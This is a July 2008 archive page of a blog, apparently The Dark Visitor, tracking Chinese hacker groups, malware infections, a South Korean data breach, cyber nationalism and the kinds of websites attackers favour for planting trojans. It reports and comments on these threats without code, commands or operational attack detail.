Archive for July, 2008

Jul 30 2008


Published by under Uncategorized

I will be attending DEFCON 16 this year.  I’m considering having a Chinese Hacker networking meeting over lunch or dinner.  If you would be interested in attending, please send me an email:  jumper a-t thedarkvisitor d0t com.

Comments Off

Jul 29 2008

Quit moving around…one, two, three: Measuring Malware in China

Hat-Tip: Benny

Oliver Day is guest posting over at and has an interesting article on research into malware infections inside China. He discusses the data and the difficulty in making an accurate analysis of what that information means:

The percent of infections claiming to be from China are not an absolute measure and it is safe to assume that there are not only registrations originating from China claiming to be from other countries but also registrations from outside the country claiming to be Chinese. One of the general assumptions I’ve operated under is that the majority of the infections we see are not operated by those who profit from the infections.

Read more about infected Chinese sites here

Comments Off

Jul 27 2008

Chinese hackers steal 9 million items of personal information from South Koreans

Published by under Hacking for money

Coming from the Korean Herald:

Police are investigating the leak of about 9 million items of personal information from the internet, allegedly obtained by a China-based hacker and misused by online Korean moneylenders.

Four private loan brokers in Seoul bought the stolen data for 15 million won ($14,900) from the hacker who allegedly broke into about 2,000 local websites in May 2006 using a computer program called “HDSI 2.0,” the Seoul Metropolitan Police Agency said.

More on the BILLIONS of Won lost here.

Update from Jumper:Here is a screenshot of the HDSI tool:
HDSI 3.0 Chinese SQL Injection Tool

3 responses so far

Jul 27 2008

Chinese cyber nationalism revisited

Published by under Nationalism

First a question: Is there a difference between nationalism and cyber nationalism? The mixture of youth and patriotism has been a defining characteristic of the Red Hacker Alliance and was essential to the group’s formation. What has been running through my head, is trying to sort out the differences between ordinary nationalism and cyber nationalism, if there is indeed a difference.

An article from The New Yorker touched on this question during an interview with Tang Jie, the producer of “2008 China Stand Up,” a nationalist short clip that went viral. Tang made the video in response to the negative press China received in their handling of the demonstrations that occurred in Tibet. Watching the video, you will see that it was heavily influenced by

The New Yorker article is well worth reading if this subject holds any interest for you. Through the interview, you get the sense that there is a psychological distinction between online cyber nationalism and real life. Perhaps it is just the difference in intensity levels that appear more vocal online but I think there is more to it than that.

Fortunately, the article also mentions a book written by Xu Wu titled, Chinese Cyber Nationalism, that I ordered today. So, I’ll get back with you on that after I have a chance to read the book.

UPDATED: Jumper has read the book and left his review in the comments section but I thought they would be better out here. Let’s just say, he does not give a glowing report on the book:

I have read the Xu Wu book already. It is pretty good in that it puts a lot of information in a well-organized format. It really could have used some better editing though. There were grammatical and spelling errors throughout the book that might be distracting for some readers (not me). I think you (Heike) might find that you are already aware of most of the information that Xu Wu talks about. Readers who are less fanatical about researching this subject will find it interesting and insightful but very academic (read: not too entertaining).

Too many facts ruin a good argument, so before we receive information from a guy who might know what he is talking about…

What is the difference between nationalism and cyber nationalism?

One response so far

Jul 27 2008

Buzul, I know Chinese hackers and you sir, are no Chinese hacker

Published by under Hacker Organization

According to, was hacked by Buzul. Sorry, that was all the details available in the article. Can someone tell me if the name Buzul is Turkish?

UPDATE: A very good friend of this blog, Maarten Van Horenbeeck comes up with the answer and more:

Buzul is the Turkish word for a “Glacier”. It’s used by at least one warez group of Turkish origin. Contextually, it’s often used to refer to something which moves slowly but cannot be stopped.

Learning experiences, distribution of illegal contents and potentially hacking all fall under this nomer (there’s actually a Turkish university bearing the name). Middle Eastern hacker groups tend to portray themselves under more dynamic images (”devils”, “waving flags”), but well, Turkey is not entirely Asian.

The hacker most likely active here is most likely Buzul Atay, indeed from Turkey, who sometimes gangs together with Cez0x, named after a pain-killer style drug. Buzul is a member of HayaletTeam, but apparently he has decided to go it alone with his friend here.

As some of you know, we have a famous Chinese hacker named Glacier too. Interesting world.

11 responses so far

Jul 25 2008

Podcast Number One

Published by under podcast

Dear TDV Readers,


Heike and I invite you to listen to our first podcast. The podcast covers some blog background and the history of Heike’s “The Dark Visitor” project. It is 49 minutes long. The show notes are here. Please enjoy and send comments to podcast [at] thedarkvisitor [dot][com].

With Warm Regards,



 Podcast RSS

iTunes download

26 responses so far

Jul 25 2008

Chinese hackers assist Trend Micro with virus cleaning tool…forget to inform Trend Micro

Published by under Chinese Malware

Well, try to do someone a favor and see how it backfires on you! Sure, a little sticky malware gets attached but is that your fault? Yeah, it really is:

Give a man a phish and he eats for a day, teach a man to phish and he infects the whole bloody interwebs.

More from Trend Micro on Chinese hacker virus cleaning tool

One response so far

Jul 23 2008

Five favorite targets of Chinese hackers

One thing that has always interested me is the types of targets Chinese hackers seek out for attack. Since it is impossible for us to protect everything, or be everywhere, understanding the most likely targets should be a high priority. Of course this is only part of a comprehensive cyber security program but knowing how your adversary thinks is one area we need to explore.

An article in gave the five most desired websites Chinese hackers sought out in order to hang trojans. Trojans have been the tool of choice for Chinese hackers since their first indigenously produced program Glacier was introduced into the cyber conflict with Taiwan in 1999.

According to, these were the preferred websites:


    Government websites

: Government sites are chosen due to low-level security and the lack of specially trained security personnel. They do not bring financial gain but have the potential to influence public opinion. This type of attack “challenges authority” and brings about personal satisfaction for the hacker. A successful attack on a government website provides the attacker with recognition and fame.


    Medium and Small-Scale company websites

: Similar to government websites due to the lack of security. While these types of attacks to not bring about fame for the hacker, they are very good practice for the novice.


    Community websites

: Huge number of visitors, even if the trojan is only around for a short period of time, it can result in a large number of infected visitors. Although the value of the individual users is not as great as a financial website, the collective of infected users can be used to create a botnet. Furthermore, this allows the hacker to steal virtual game assets and QQ (ICQ) money.


    Financial websites

: This type of website does not have a larger number of users but the average individual has a high net worth. If a hacker is able to install a trojan here, they can gain user account passwords, access bank accounts and control stock securities. Although this type of website has very high security, it is the most desirable.


    E-commerce sites

: These website share the benefits of both community and financial websites and are the most lucrative. Hackers are able to manipulate price, supply/demand and control the online transactions. Furthermore, they can use trusted user accounts to construct phishing “activities.” E-commerce website are the most favored for hackers to carry out phishing exploits.

Army lessons learned: First rule in the Army is never present a problem without a solution. Solution, hire people like Jumper who are experts in preventing these types of attacks.

People often ask me if I am worried about this website getting hacked or shutdown by Chinese hackers…I tell them no, I have an excellent firewall…called Jumper.

One response so far

Jul 22 2008

Chinese and Iranian hacker connection?

Published by under US attacks

Skimming through the news today and came across an article in, on Iranian hacker attempts to disrupt Jewish American leader’s message to Iran. A small blurb in the piece suggested that there was some evidence of Chinese fingerprints or assistance:

In the month since Hoenlein’s message was posted, Rosen said there have been «dozens» of attempts to hack into the site, called He said they succeeded in labeling the Web site as «dangerous» on the Google search engine.

In an e-mail message to The Associated Press, Rosen said his technicians identified the hackers as «probably Iranian based with Chinese assistance or fingerprints.

I have written to Jerusalemonline for further clarification on this section of the article and hopefully will have an update. It would be very interesting to see if there is more to this, even if the Iranians are just using Chinese hacker malware.

2 responses so far

Jul 21 2008

Leader of Chinese female hacker “security” team not happy

On May 29th, we posted a profile of Cn Girl Security Team, an organization of female hackers. A reporter from the Daily News and Analysis, Venkatesan Vembu, picked up the story and called for an interview.

Not sure how widely the story was circulated in the western press but it sure was popular in China.

On her blog, Xiao Tian admits that all the sudden publicity came as a shock when people started calling asking about the article. She claims to have stepped away from the “security” site for quite some time and that much of what was written was hype. Just a girl who enjoys blogging and computers. For someone who takes so many pictures of herself, it is hard to believe that this has become such a burden on her.

The Cn Girl Security Team website has been showing a 403 error for the past week and some have suggested it was done by hackers. They say this further demonstrates the low-level technical skills possessed by the group. Xiao Tian denies the rumor and contends there was a problem with the hosting service.

Either way, one more hacker website bites the dust. Hundreds remain but we got you covered.

2 responses so far

Next »